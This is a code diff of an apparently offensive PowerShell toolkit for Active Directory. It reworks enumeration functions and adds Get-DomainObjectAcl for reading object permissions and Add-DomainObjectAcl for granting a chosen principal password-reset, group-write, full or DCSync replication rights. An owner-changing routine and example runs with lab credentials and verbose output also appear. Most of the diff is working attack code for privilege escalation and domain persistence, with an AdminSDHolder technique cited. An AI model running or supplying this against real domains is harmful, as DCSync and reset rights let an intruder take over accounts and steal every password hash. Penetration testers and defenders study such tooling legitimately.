+                    $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference)
+                    $Entry.PsBase.CommitChanges()
+                }
+                catch {
+                    Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_"
+                }
             }
-            $Results.dispose()
-            $RightsSearcher.dispose()
-        }
-        catch {
-            Write-Verbose "Error in building GUID map: $_"
         }
     }
-
-    $GUIDs
 }
 
 
-function Get-NetComputer {
+function Get-DomainObjectAcl {
 <#
-    .SYNOPSIS
-
-        This function utilizes adsisearcher to query the current AD context
-        for current computer objects. Based off of Carlos Perez's Audit.psm1
-        script in Posh-SecMod (link below).
-
-    .PARAMETER ComputerName
+.SYNOPSIS
 
-        Return computers with a specific name, wildcards accepted.
+Returns the ACLs associated with a specific active directory object.
 
-    .PARAMETER SPN
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap  
 
-        Return computers with a specific service principal name, wildcards accepted.
+.PARAMETER Identity
 
-    .PARAMETER OperatingSystem
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
 
-        Return computers with a specific operating system, wildcards accepted.
+.PARAMETER ResolveGUIDs
 
-    .PARAMETER ServicePack
+Switch. Resolve GUIDs to their display names.
 
-        Return computers with a specific service pack, wildcards accepted.
+.PARAMETER RightsFilter
 
-    .PARAMETER Filter
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
 
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
+.PARAMETER Domain
 
-    .PARAMETER Printers
+Specifies the domain to use for the query, defaults to the current domain.
 
-        Switch. Return only printers.
+.PARAMETER LDAPFilter
 
-    .PARAMETER Ping
+Specifies an LDAP query string that is used to filter Active Directory objects.
 
-        Switch. Ping each host to ensure it's up before enumerating.
+.PARAMETER SearchBase
 
-    .PARAMETER FullData
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        Switch. Return full computer objects instead of just system names (the default).
+.PARAMETER Server
 
-    .PARAMETER Domain
+Specifies an Active Directory server (domain controller) to bind to.
 
-        The domain to query for computers, defaults to the current domain.
+.PARAMETER SearchScope
 
-    .PARAMETER DomainController
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER ResultPageSize
 
-    .PARAMETER ADSpath
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
-    
-    .PARAMETER SiteName
+.PARAMETER ServerTimeLimit
 
-        The AD Site name to search for computers.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER Unconstrained
+.PARAMETER Tombstone
 
-        Switch. Return computer objects that have unconstrained delegation.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER PageSize
+.PARAMETER Credential
 
-        The PageSize to set for the LDAP searcher object.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-    .PARAMETER Credential
+.EXAMPLE
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
 
-    .EXAMPLE
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
 
-        PS C:\> Get-NetComputer
-        
-        Returns the current computers in current domain.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
 
-        PS C:\> Get-NetComputer -SPN mssql*
-        
-        Returns all MS SQL servers on the domain.
+Enumerate the ACL permissions for all OUs in the domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetComputer -Domain testing
-        
-        Returns the current computers in 'testing' domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
 
-    .EXAMPLE
+.OUTPUTS
 
-        PS C:\> Get-NetComputer -Domain testing -FullData
-        
-        Returns full computer objects in the 'testing' domain.
+PowerView.ACL
 
-    .LINK
-
-        https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1
+Custom PSObject with ACL entries.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.ACL')]
     [CmdletBinding()]
     Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [String]
-        $ComputerName = '*',
-
-        [String]
-        $SPN,
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String[]]
+        $Identity,
 
-        [String]
-        $OperatingSystem,
+        [Switch]
+        $ResolveGUIDs,
 
         [String]
-        $ServicePack,
+        [Alias('Rights')]
+        [ValidateSet('All', 'ResetPassword', 'WriteMembers')]
+        $RightsFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Filter,
-
-        [Switch]
-        $Printers,
-
-        [Switch]
-        $Ping,
-
-        [Switch]
-        $FullData,
+        $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $Domain,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
         [String]
-        $DomainController,
+        $SearchBase,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $ADSpath,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $SiteName,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $Unconstrained,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    begin {
-        # so this isn't repeated if multiple computer names are passed on the pipeline
-        $CompSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize -Credential $Credential
-    }
-
-    process {
+    BEGIN {
+        $SearcherArguments = @{
+            'SecurityMasks' = 'Dacl'
+            'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'
+        }
+        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+        $Searcher = Get-DomainSearcher @SearcherArguments
+
+        $DomainGUIDMapArguments = @{}
+        if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain }
+        if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server }
+        if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential }
 
-        if ($CompSearcher) {
+        # get a GUID -> name mapping
+        if ($PSBoundParameters['ResolveGUIDs']) {
+            $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments
+        }
+    }
 
-            # if we're checking for unconstrained delegation
-            if($Unconstrained) {
-                Write-Verbose "Searching for computers with for unconstrained delegation"
-                $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
-            }
-            # set the filters for the seracher if it exists
-            if($Printers) {
-                Write-Verbose "Searching for printers"
-                # $CompSearcher.filter="(&(objectCategory=printQueue)$Filter)"
-                $Filter += "(objectCategory=printQueue)"
+    PROCESS {
+        if ($Searcher) {
+            $IdentityFilter = ''
+            $Filter = ''
+            $Identity | Where-Object {$_} | ForEach-Object {
+                $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+                if ($IdentityInstance -match '^S-1-.*') {
+                    $IdentityFilter += "(objectsid=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') {
+                    $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+                }
+                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+                    $IdentityFilter += "(objectguid=$GuidByteString)"
+                }
+                elseif ($IdentityInstance.Contains('.')) {
+                    $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+                }
+                else {
+                    $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
+                }
             }
-            if($SPN) {
-                Write-Verbose "Searching for computers with SPN: $SPN"
-                $Filter += "(servicePrincipalName=$SPN)"
+            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+                $Filter += "(|$IdentityFilter)"
             }
-            if($OperatingSystem) {
-                $Filter += "(operatingsystem=$OperatingSystem)"
-            }
-            if($ServicePack) {
-                $Filter += "(operatingsystemservicepack=$ServicePack)"
+
+            if ($PSBoundParameters['LDAPFilter']) {
+                Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter"
+                $Filter += "$LDAPFilter"
             }
-            if($SiteName) {
-                $Filter += "(serverreferencebl=$SiteName)"
+
+            if ($Filter) {
+                $Searcher.filter = "(&$Filter)"
             }
+            Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)"
 
-            $CompFilter = "(&(sAMAccountType=805306369)(dnshostname=$ComputerName)$Filter)"
-            Write-Verbose "Get-NetComputer filter : '$CompFilter'"
-            $CompSearcher.filter = $CompFilter
+            $Results = $Searcher.FindAll()
+            $Results | Where-Object {$_} | ForEach-Object {
+                $Object = $_.Properties
 
-            try {
-                $Results = $CompSearcher.FindAll()
-                $Results | Where-Object {$_} | ForEach-Object {
-                    $Up = $True
-                    if($Ping) {
-                        # TODO: how can these results be piped to ping for a speedup?
-                        $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname
-                    }
-                    if($Up) {
-                        # return full data objects
-                        if ($FullData) {
-                            # convert/process the LDAP fields for each result
-                            $Computer = Convert-LDAPProperty -Properties $_.Properties
-                            $Computer.PSObject.TypeNames.Add('PowerView.Computer')
-                            $Computer
+                if ($Object.objectsid -and $Object.objectsid[0]) {
+                    $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value
+                }
+                else {
+                    $ObjectSid = $Null
+                }
+
+                try {
+                    New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | Select-Object -Expand DiscretionaryAcl | ForEach-Object {
+
+                        if ($PSBoundParameters['RightsFilter']) {
+                            $GuidFilter = Switch ($RightsFilter) {
+                                'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
+                                'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+                                Default { '00000000-0000-0000-0000-000000000000' }
+                            }
+                            if ($_.ObjectType -eq $GuidFilter) {
+                                $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+                                $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+                                $Continue = $True
+                            }
                         }
                         else {
-                            # otherwise we're just returning the DNS host name
-                            $_.properties.dnshostname
+                            $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+                            $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+                            $Continue = $True
+                        }
+
+                        if ($Continue) {
+                            $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask))
+
+                            if ($GUIDs) {
+                                # if we're resolving GUIDs, map them them to the resolved hash table
+                                $AclProperties = @{}
+                                $_.psobject.properties | ForEach-Object {
+                                    if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') {
+                                        try {
+                                            $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()]
+                                        }
+                                        catch {
+                                            $AclProperties[$_.Name] = $_.Value
+                                        }
+                                    }
+                                    else {
+                                        $AclProperties[$_.Name] = $_.Value
+                                    }
+                                }
+                                $OutObject = New-Object -TypeName PSObject -Property $AclProperties
+                                $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+                                $OutObject
+                            }
+                            else {
+                                $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+                                $_
+                            }
                         }
                     }
                 }
-                $Results.dispose()
-                $CompSearcher.dispose()
-            }
-            catch {
-                Write-Warning "Error: $_"
+                catch {
+                    Write-Verbose "[Get-DomainObjectAcl] Error: $_"
+                }
             }
         }
     }
 }
 
 
-function Get-ADObject {
+function Add-DomainObjectAcl {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainObject  
+
+.DESCRIPTION
+
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity. Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID. These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+.PARAMETER TargetIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for. Required. Wildcards accepted.
+
+.PARAMETER TargetDomain
+
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+.PARAMETER TargetLDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+.PARAMETER TargetSearchBase
+
+The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER PrincipalIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL. Required. Wildcards accepted.
+
+.PARAMETER PrincipalDomain
+
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+.PARAMETER PrincipalLDAPFilter
+
+Specifies an LDAP query string that is used to filter for the Active Directory object principal.
 
-        Takes a domain SID and returns the user, group, or computer object
-        associated with it.
+.PARAMETER PrincipalSearchBase
 
-    .PARAMETER SID
+The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
 
-        The SID of the domain object you're querying for.
+.PARAMETER Server
 
-    .PARAMETER Name
+Specifies an Active Directory server (domain controller) to bind to.
 
-        The Name of the domain object you're querying for.
+.PARAMETER SearchScope
 
-    .PARAMETER SamAccountName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        The SamAccountName of the domain object you're querying for. 
+.PARAMETER ResultPageSize
 
-    .PARAMETER Domain
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The domain to query for objects, defaults to the current domain.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER DomainController
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
 
-    .PARAMETER ADSpath
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER Credential
 
-    .PARAMETER Filter
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        Additional LDAP filter string for the query.
+.PARAMETER Rights
 
-    .PARAMETER ReturnRaw
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
 
-        Switch. Return the raw object instead of translating its properties.
-        Used by Set-ADObject to modify object properties.
+.PARAMETER RightsGUID
 
-    .PARAMETER PageSize
+Manual GUID representing the right to add to the target.
 
-        The PageSize to set for the LDAP searcher object.
+.EXAMPLE
 
-    .PARAMETER Credential
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+...
 
-    .EXAMPLE
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
 
-        PS C:\> Get-ADObject -SID "S-1-5-21-2620891829-2411261497-1773853088-1110"
-        
-        Get the domain object associated with the specified SID.
-        
-    .EXAMPLE
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
 
-        PS C:\> Get-ADObject -ADSpath "CN=AdminSDHolder,CN=System,DC=testlab,DC=local"
-        
-        Get the AdminSDHolder object for the testlab.local domain.
+AceQualifier           : AccessAllowed
+ObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights  : ExtendedRight
+ObjectAceType          : User-Force-Change-Password
+ObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags       : None
+BinaryLength           : 56
+AceType                : AccessAllowedObject
+ObjectAceFlags         : ObjectAceTypePresent
+IsCallback             : False
+PropagationFlags       : None
+SecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask             : 256
+AuditFlags             : None
+IsInherited            : False
+AceFlags               : None
+InheritedObjectAceType : All
+OpaqueLength           : 0
+
+.EXAMPLE
+
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+[no results returned]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier           : AccessAllowed
+ObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights  : ExtendedRight
+ObjectAceType          : User-Force-Change-Password
+ObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags       : None
+BinaryLength           : 56
+AceType                : AccessAllowedObject
+ObjectAceFlags         : ObjectAceTypePresent
+IsCallback             : False
+PropagationFlags       : None
+SecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask             : 256
+AuditFlags             : None
+IsInherited            : False
+AceFlags               : None
+InheritedObjectAceType : All
+OpaqueLength           : 0
+
+.LINK
+
+https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
     [CmdletBinding()]
     Param (
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $SID,
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+        [String[]]
+        $TargetIdentity,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Name,
+        $TargetDomain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $SamAccountName,
+        $TargetLDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $Domain,
+        $TargetSearchBase,
+
+        [Parameter(Mandatory = $True)]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $PrincipalIdentity,
 
+        [ValidateNotNullOrEmpty()]
         [String]
-        $DomainController,
+        $PrincipalDomain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $ADSpath,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $Filter,
+        $SearchScope = 'Subtree',
 
-        [Switch]
-        $ReturnRaw,
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ResultPageSize = 200,
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ServerTimeLimit,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
+
+        [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')]
+        [String]
+        $Rights = 'All',
+
+        [Guid]
+        $RightsGUID
     )
-    process {
-        if($SID) {
-            # if a SID is passed, try to resolve it to a reachable domain name for the searcher
-            try {
-                $Name = Convert-SidToName $SID
-                if($Name) {
-                    $Canonical = Convert-ADName -ObjectName $Name -InputType NT4 -OutputType Canonical
-                    if($Canonical) {
-                        $Domain = $Canonical.split("/")[0]
-                    }
-                    else {
-                        Write-Warning "Error resolving SID '$SID'"
-                        return $Null
-                    }
-                }
-            }
-            catch {
-                Write-Warning "Error resolving SID '$SID' : $_"
-                return $Null
-            }
+
+    BEGIN {
+        $TargetSearcherArguments = @{
+            'Properties' = 'distinguishedname'
+            'Raw' = $True
+        }
+        if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain }
+        if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }
+        if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }
+        if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }
+
+        $PrincipalSearcherArguments = @{
+            'Identity' = $PrincipalIdentity
+            'Properties' = 'distinguishedname,objectsid'
+        }
+        if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
+        if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
+        $Principals = Get-DomainObject @PrincipalSearcherArguments
+        if (-not $Principals) {
+            throw "Unable to resolve principal: $PrincipalIdentity"
         }
+    }
 
-        $ObjectSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+    PROCESS {
+        $TargetSearcherArguments['Identity'] = $TargetIdentity
+        $Targets = Get-DomainObject @TargetSearcherArguments
 
-        if($ObjectSearcher) {
-            if($SID) {
-                $ObjectSearcher.filter = "(&(objectsid=$SID)$Filter)"
-            }
-            elseif($Name) {
-                $ObjectSearcher.filter = "(&(name=$Name)$Filter)"
+        ForEach ($TargetObject in $Targets) {
+
+            $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'
+            $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'
+            $ACEs = @()
+
+            if ($RightsGUID) {
+                $GUIDs = @($RightsGUID)
             }
-            elseif($SamAccountName) {
-                $ObjectSearcher.filter = "(&(samAccountName=$SamAccountName)$Filter)"
+            else {
+                $GUIDs = Switch ($Rights) {
+                    # ResetPassword doesn't need to know the user's current password
+                    'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
+                    # allows for the modification of group membership
+                    'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+                    # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
+                    # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
+                    # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
+                    #   when applied to a domain's ACL, allows for the use of DCSync
+                    'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}
+                }
             }
 
-            $Results = $ObjectSearcher.FindAll()
-            $Results | Where-Object {$_} | ForEach-Object {
-                if($ReturnRaw) {
-                    $_
+            ForEach ($PrincipalObject in $Principals) {
+                Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)"
+
+                try {
+                    $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)
+
+                    if ($GUIDs) {
+                        ForEach ($GUID in $GUIDs) {
+                            $NewGUID = New-Object Guid $GUID
+                            $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'
